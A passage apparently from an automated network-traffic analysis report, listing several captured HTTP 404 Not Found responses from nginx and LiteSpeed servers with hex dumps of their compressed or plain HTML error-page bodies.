b1 fe a9 d7 77 ea 47 2e e5 15 7a 7c 51 12 ca 9f 26 38 55 16 eb 6a 81 12 58 42 5d b7 f4 af 4f dc 3b 67 7d da db 7c 35 c5 17 bd 40 9c f8 52 6f 26 69 3c e8 62 9d db 05 0a 29 fd 7e c2 4b 6d 41 35 6e b6 2a 29 aa 35 e4 9c 12 ca 07 35 fd aa 41 5a ad d9 2c 90 00 f7 2f 97 73 a4 76 ae 11 57 72 aa a8 74 dd bb d8 16 db 02 31 4a 9f 9d 80 eb ce 3b b5 b3 e6 84 5e ea 6c 4a ee b5 aa aa d8 28 ab 3f 7d ea 07 69 af bd 9b 16 a6 c2 e9 ae 6e 07 60 aa 79 71 c6 cb 8a b2 c4 1b 93 42 9a 20 98 fc 9b 8a 33 95 ea b7 d5 85 5a b7 a3 16 a8 63 4e 71 45 95 99 5e 78 cc ab 8c fd 24 eb 57 00 2c 9e 92 7a 9c ae 6b 53 9f 01 93 98 33 1e 9e 00 27 a4 1e 78 50 75 05 4b 74 06 cd b2 24 11 e2 04 3a 21 f5 d0 66 97 24 ba 69 ce dd 55 77 ca 3f b5 3a 21 0d 61 c2 72 e2 12 56 46 f7 e8 bc af 2a 26 f8 50 0d c3 0a 8f 94 1e 9b ea 26 a9 8b 6d 9b 46 57 ce 67 f6 43 ea ae ef 97 21 3b a9 e6 ae c8 19 e1 63 91 43 3b d0 78 70 87 9f 55 61 66 8c 1d 4b 70 5a ae fe 58 c4 13 b5 b0 ef 7a ad e7 55 91 ea 52 1d 31 6b 2e cb cd 31 c6 5a eb 60 3f df eb 63 56 43 c1 34 e8 a4 9a b2 da 6c fa e1 cc b8 10 2d 20 fb c8 bf 76 bb dd 5c f0 d9 84 ef 5e cb f9 d0 78 97 f3 fe 3c 58 ba 06 dc f6 e4 b4 d8 a3 a4 54 4d b3 f2 c6 fd e7 b5 3d 7a ca aa cd a1 23 9e 01 ca 9e 7a 42 be dc 71 67 5b 65 00 c1 89 b0 5f f7 c3 59 0f 6e 77 c7 a4 76 32 85 3f ef 74 d3 66 2e 29 ea a4 d4 de 80 78 d8 94 15 20 72 6b b7 8b f9 fc 70 38 90 83 20 a6 5e cf 39 a5 74 0e aa 47 49 77 ac bd 32 0f 2b 8f 22 8a 24 e3 ee 19 98 83 2f b3 e5 56 d9 7c 98 cc d2 95 f7 4e 52 1f ba 6b 90 50 a8 d0 80 c4 71 88 19 63 84 fa 02 71 3f c2 f0 b8 ef 6d 84 44 cc 1d 17 45 4e fa 26 42 8c c5 84 46 a2 fb 82 74 4b 47 51 e3 10 ad 86 a8 d5 e0 9e 2f ef 78 c0 49 20 25 8a 69 82 a5 4f
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 10 Sep 2024 06:49:48 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingETag: W/"66cd104a-b96"Content-Encoding: gzipData Raw: 35 34 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 56 59 8f db 36 10 7e 76 7e 05 a3 22 48 0b 2c 69 1e a2 0e c7 5e 34 d9 26 68 1e 72 a0 db a2 e8 53 c0 95 28 4b 5d 59 74 24 da 5e a7 c8 7f ef 50 d7 ca 76 82 16 ba c8 99 f9 e6 e2 70 a8 e5 d3 5f 3e dc fc fe d7 c7 d7 28 b7 9b f2 fa c9 d2 7d 50 a9 aa f5 ca d3 95 77 fd 64 b6 cc b5 4a e1 3b 5b 6e b4 55 28 c9 55 dd 68 bb f2 76 36 c3 91 87 e6 8f ac 4a 6d f4 ca db 17 fa b0 35 b5 f5 50 62 2a ab 2b 10 3d 14 a9 cd 57 a9 de 17 89 c6 ed e4 0a 15 55 61 0b 55 e2 26 51 a5 5e b1 41 91 2d 6c a9 af 3f aa b5 46 ef 8d 45 6f cc ae 4a 97 f3 8e ea f8 8d 3d 76 a3 d9 9d 49 8f e8 1f 37 9a dd a9 e4 7e 5d 3b 51 9c 98 d2 d4 0b f4 43 26 dd f5 a2 65 6f 54 bd 2e 2a 6c cd 76 81 a2 67 1d 6d 90 93 a9 bb 3a 5a 06 fe e2 4c 6d 8a f2 b8 40 58 6d b7 a5 c6 cd b1 b1 7a 73 85 5e 95 45 75 ff 4e 25 b7 ed fc 0d 48 5e 21 ef 56 af 8d 46 7f bc f5 ae d0 6f e6 ce 58 03 b4 5f 75 b9 d7 b6 48 14 7a af 77 1a 38 2f 6b 08 f3 aa 35 30 f3 20 26 83 6e 55 d5 00 a3 81 0f 6e 74 5d 64 00 7b e9 ac a1 1b e7 15 7a bd 31 7f 17 de 44 ff 37 28 b7 c7 cd 9d 29 bd 13 bd 53 74 17 91 d5 0f 16 37 b9 4a cd 61 81 e8 f6 01 b1 fe a9 d7 77 ea 47 2e e5 15 7a 7c 51 12 ca 9f 26 38 55 16 eb 6a 81 12 58 42 5d b7 f4 af 4f dc 3b 67 7d da db 7c 35 c5 17 bd 40 9c f8 52 6f 26 69 3c e8 62 9d db 05 0a 29 fd 7e c2 4b 6d 41 35 6e b6 2a 29 aa 35 e4 9c 12 ca 07 35 fd aa 41 5a ad d9 2c 90 00 f7 2f 97 73 a4 76 ae 11 57 72 aa a8 74 dd bb d8 16 db 02 31 4a 9f 9d 80 eb ce 3b b5 b3 e6 84 5e ea 6c 4a ee b5 aa aa d8 28 ab 3f 7d ea 07 69 af bd 9b 16 a6 c2 e9 ae 6e 07 60 aa 79 71 c6 cb 8a b2 c4 1b 93 42 9a 20 98 fc 9b 8a 33 95 ea b7 d5 85 5a b7 a3 16 a8 63 4e 71 45 95 99 5e 78 cc ab 8c fd 24 eb 57 00 2c 9e 92 7a 9c ae 6b 53 9f 01 93 98 33 1e 9e 00 27 a4 1e 78 50 75 05 4b 74 06 cd b2 24 11 e2 04 3a 21 f5 d0 66 97 24 ba 69 ce dd 55 77 ca 3f b5 3a 21 0d 61 c2 72 e2 12 56 46 f7 e8 bc af 2a 26 f8 50 0d c3 0a 8f 94 1e 9b ea 26 a9 8b 6d 9b 46 57 ce 67 f6 43 ea ae ef 97 21 3b a9 e6 ae c8 19 e1 63 91 43 3b d0 78 70 87 9f 55 61 66 8c 1d 4b 70 5a ae fe 58 c4 13 b5 b0 ef 7a ad e7 55 91 ea 52 1d 31 6b 2e cb cd 31 c6 5a eb 60 3f df eb 63 56 43 c1 34 e8 a4 9a b2 da 6c fa e1 cc b8 10 2d 20 fb c8 bf 76 bb dd 5c f0 d9 84 ef 5e cb f9 d0 78 97 f3 fe 3c 58 ba 06 dc f6 e4 b4 d8 a3 a4 54 4d b3 f2 c6 fd e7 b5 3d 7a ca aa cd a1 23 9e 01 ca 9e 7a 42 be dc 71 67 5b 65 00 c1 89 b0 5f f7 c3 59 0f 6e 77 c7 a4 76 32 85 3f ef 74 d3 66 2e 29 ea a4 d4 de 80 78 d8 94 15 20 72 6b b7 8b f9 fc 70 38 90 83 20 a6 5e cf 39 a5 74 0e aa 47 49 77 ac bd 32 0f 2b 8f 22 8a 24 e3 ee 19 98 83 2f b3 e5 56 d9 7c 98 cc d2 95 f7 4e 52 1f ba 6b 90 50 a8 d0 80 c4 71 88 19 63 84 fa 02 71 3f c2 f0 b8 ef 6d 84 44 cc 1d 17 45 4e fa 26 42 8c c5 84 46 a2 fb 82 74 4b 47 51 e3 10 ad 86 a8 d5 e0 9e 2f ef 78 c0 49 20 25 8a 69 82 a5 4f
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 10 Sep 2024 06:49:51 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingETag: W/"66cd104a-b96"Content-Encoding: gzipData Raw: 35 34 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 56 59 8f db 36 10 7e 76 7e 05 a3 22 48 0b 2c 69 1e a2 0e c7 5e 34 d9 26 68 1e 72 a0 db a2 e8 53 c0 95 28 4b 5d 59 74 24 da 5e a7 c8 7f ef 50 d7 ca 76 82 16 ba c8 99 f9 e6 e2 70 a8 e5 d3 5f 3e dc fc fe d7 c7 d7 28 b7 9b f2 fa c9 d2 7d 50 a9 aa f5 ca d3 95 77 fd 64 b6 cc b5 4a e1 3b 5b 6e b4 55 28 c9 55 dd 68 bb f2 76 36 c3 91 87 e6 8f ac 4a 6d f4 ca db 17 fa b0 35 b5 f5 50 62 2a ab 2b 10 3d 14 a9 cd 57 a9 de 17 89 c6 ed e4 0a 15 55 61 0b 55 e2 26 51 a5 5e b1 41 91 2d 6c a9 af 3f aa b5 46 ef 8d 45 6f cc ae 4a 97 f3 8e ea f8 8d 3d 76 a3 d9 9d 49 8f e8 1f 37 9a dd a9 e4 7e 5d 3b 51 9c 98 d2 d4 0b f4 43 26 dd f5 a2 65 6f 54 bd 2e 2a 6c cd 76 81 a2 67 1d 6d 90 93 a9 bb 3a 5a 06 fe e2 4c 6d 8a f2 b8 40 58 6d b7 a5 c6 cd b1 b1 7a 73 85 5e 95 45 75 ff 4e 25 b7 ed fc 0d 48 5e 21 ef 56 af 8d 46 7f bc f5 ae d0 6f e6 ce 58 03 b4 5f 75 b9 d7 b6 48 14 7a af 77 1a 38 2f 6b 08 f3 aa 35 30 f3 20 26 83 6e 55 d5 00 a3 81 0f 6e 74 5d 64 00 7b e9 ac a1 1b e7 15 7a bd 31 7f 17 de 44 ff 37 28 b7 c7 cd 9d 29 bd 13 bd 53 74 17 91 d5 0f 16 37 b9 4a cd 61 81 e8 f6 01 b1 fe a9 d7 77 ea 47 2e e5 15 7a 7c 51 12 ca 9f 26 38 55 16 eb 6a 81 12 58 42 5d b7 f4 af 4f dc 3b 67 7d da db 7c 35 c5 17 bd 40 9c f8 52 6f 26 69 3c e8 62 9d db 05 0a 29 fd 7e c2 4b 6d 41 35 6e b6 2a 29 aa 35 e4 9c 12 ca 07 35 fd aa 41 5a ad d9 2c 90 00 f7 2f 97 73 a4 76 ae 11 57 72 aa a8 74 dd bb d8 16 db 02 31 4a 9f 9d 80 eb ce 3b b5 b3 e6 84 5e ea 6c 4a ee b5 aa aa d8 28 ab 3f 7d ea 07 69 af bd 9b 16 a6 c2 e9 ae 6e 07 60 aa 79 71 c6 cb 8a b2 c4 1b 93 42 9a 20 98 fc 9b 8a 33 95 ea b7 d5 85 5a b7 a3 16 a8 63 4e 71 45 95 99 5e 78 cc ab 8c fd 24 eb 57 00 2c 9e 92 7a 9c ae 6b 53 9f 01 93 98 33 1e 9e 00 27 a4 1e 78 50 75 05 4b 74 06 cd b2 24 11 e2 04 3a 21 f5 d0 66 97 24 ba 69 ce dd 55 77 ca 3f b5 3a 21 0d 61 c2 72 e2 12 56 46 f7 e8 bc af 2a 26 f8 50 0d c3 0a 8f 94 1e 9b ea 26 a9 8b 6d 9b 46 57 ce 67 f6 43 ea ae ef 97 21 3b a9 e6 ae c8 19 e1 63 91 43 3b d0 78 70 87 9f 55 61 66 8c 1d 4b 70 5a ae fe 58 c4 13 b5 b0 ef 7a ad e7 55 91 ea 52 1d 31 6b 2e cb cd 31 c6 5a eb 60 3f df eb 63 56 43 c1 34 e8 a4 9a b2 da 6c fa e1 cc b8 10 2d 20 fb c8 bf 76 bb dd 5c f0 d9 84 ef 5e cb f9 d0 78 97 f3 fe 3c 58 ba 06 dc f6 e4 b4 d8 a3 a4 54 4d b3 f2 c6 fd e7 b5 3d 7a ca aa cd a1 23 9e 01 ca 9e 7a 42 be dc 71 67 5b 65 00 c1 89 b0 5f f7 c3 59 0f 6e 77 c7 a4 76 32 85 3f ef 74 d3 66 2e 29 ea a4 d4 de 80 78 d8 94 15 20 72 6b b7 8b f9 fc 70 38 90 83 20 a6 5e cf 39 a5 74 0e aa 47 49 77 ac bd 32 0f 2b 8f 22 8a 24 e3 ee 19 98 83 2f b3 e5 56 d9 7c 98 cc d2 95 f7 4e 52 1f ba 6b 90 50 a8 d0 80 c4 71 88 19 63 84 fa 02 71 3f c2 f0 b8 ef 6d 84 44 cc 1d 17 45 4e fa 26 42 8c c5 84 46 a2 fb 82 74 4b 47 51 e3 10 ad 86 a8 d5 e0 9e 2f ef 78 c0 49 20 25 8a 69 82 a5 4f
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 10 Sep 2024 06:49:53 GMTContent-Type: text/html; charset=utf-8Content-Length: 2966Connection: closeVary: Accept-EncodingETag: "66cd104a-b96"Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 62 6f 64 79 20 7b 0a 09 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 35 66 35 66 35 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 38 25 3b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 35 64 35 64 35 64 3b 0a 09 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 22 53 65 67 6f 65 20 55 49 22 2c 20 52 6f 62 6f 74 6f 2c 20 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 20 41 72 69 61 6c 2c 0a 09 09 09 09 09 22 4e 6f 74 6f 20 53 61 6e 73 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 2c 20 22 41 70 70 6c 65 20 43 6f 6c 6f 72 20 45 6d 6f 6a 69 22 2c 20 22 53 65 67 6f 65 20 55 49 20 45 6d 6f 6a 69 22 2c 20 22 53 65 67 6f 65 20 55 49 20 53 79 6d 62 6f 6c 22 2c 0a 09 09 09 09 09 22 4e 6f 74 6f 20 43 6f 6c 6f 72 20 45 6d 6f 6a 69 22 3b 0a 09 09 09 09 74 65 78 74 2d 73 68 61 64 6f 77 3a 20 30 70 78 20 31 70 78 20 31 70 78 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 37 35 29 3b 0a 09 09 09 09 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 09 09 09 7d 0a 0a 09 09 09 68 31 20 7b 0a 09 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 2e 34 35 65 6d 3b 0a 09 09 09 09 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 37 30 30 3b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 35 64 35 64 35 64 3b 0a 09 09 09 09 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 20 2d 30 2e 30 32 65 6d 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 33 30 70 78 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 33 30 70 78 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 09 09 09 09 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 61 6e 69 6d 61 74 65 5f 5f 61 6e 69 6d 61 74 65 64 20 7b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 64 75 72 61 74 69 6f 6e 3a 20 31 73 3b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 66 69 6c 6c 2d 6d 6f 64 65 3a 20 62 6f 74 68 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 61 6e 69 6d 61 74 65 5f 5f 66 61 64 65 49 6e 20 7b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 6e 61 6d 6
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Tue, 10 Sep 2024 06:50:03 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Tue, 10 Sep 2024 06:50:06 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Tue, 10 Sep 2024 06:50:08 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
